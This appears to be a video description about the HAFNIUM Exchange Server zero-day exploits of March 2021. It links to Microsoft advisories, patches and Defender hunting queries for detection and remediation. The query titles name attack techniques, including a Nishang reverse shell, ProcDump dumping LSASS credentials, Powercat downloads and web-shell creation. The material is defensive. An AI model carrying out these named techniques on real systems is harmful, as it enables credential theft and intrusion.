HAFNIUM Exchange Server 0-Day Exploits

***please read the documentation in the links below for more info on remediation*** Let’s talk about the Exchange Server 0-Day exploits announced on March 2 2021. I’ll cover what the threat is, the vulnerabilities, patching and using Microsoft Defender for Endpoint and Azure Sentinel for detection and remediation.

Table of Contents:
00:00:00 Intro
00:00:30 Overview
00:02:30 Who?
00:03:30 Technical Details
00:05:26 Attack Details
00:09:00 Detection and Mitigation

Ghost in the shell: Investigating web shell attacks
https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/
HAFNIUM targeting Exchange Servers with 0-day exploits – Microsoft Security – https://lnkd.in/gcRFAMB
New nation-state cyberattacks – https://lnkd.in/gvckFkY
**new** blog with IOCs and patching guidance https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020
HAFNIUM targeting Exchange Servers with 0-day exploits https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
Released: March 2021 Exchange Server Security Updates https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901
Exchange Server Security Update FAQ https://webcastdiag864.blob.core.windows.net/2021presentationdecks/March%202021%20Exchange%20Server%20Security%20Update%20-%20v1.2%20-%20EN.pdf
More FAQ on Issues w/ Update https://docs.microsoft.com/en-us/exchange/troubleshoot/client-connectivity/exchange-security-update-issues
Defending Exchange servers under attack https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/
Released: March 2021 Exchange Server Security Updates https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901
Web shell attacks continue to rise https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/
ProcDump: https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
LSASS: https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service
Dept of Homeland Security Directive: https://cyber.dhs.gov/ed/21-02/
Reverse shell loaded using Nishang Invoke-PowerShellTcpOneLine technique https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Execution/reverse-shell-nishang.md
Procdump dumping LSASS credentials https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Credential%20Access/procdump-lsass-credentials.md#procdump-dumping-lsass-credentials
7-ZIP used by attackers to prepare data for exfiltration https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exfiltration/7-zip-prep-for-exfiltration.md
Exchange PowerShell snap-in being loaded https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exfiltration/exchange-powershell-snapin-loaded.md
Powercat exploitation tool downloaded https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/powercat-download.md
Exchange vulnerability launching subprocesses through UMWorkerProcess https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Execution/umworkerprocess-unusual-subprocess-activity.md
Exchange vulnerability creating web shells via UMWorkerProcess https://github.com/martyav/Microsoft-threat-protection-Hunting-Queries/blob/298c96f625612debfb561bb66d2c0030cc304a83/Execution/umworkerprocess-creating-webshell.md

Note: The views and expressions on my videos do not represent those of my employer and are strictly my own.

All content provided on this channel is for informational purposes only. The owner of this channel makes no representations as to the accuracy or completeness of any information on this site or found by following any link on this channel.

The owner of this channel will not be liable for any errors or omissions in this information nor for the availability of this information. The owner will not be liable for any losses, injuries, or damages from the display or use of this information.

These terms and conditions is subject to change at anytime with or without notice.

source

windows server 2012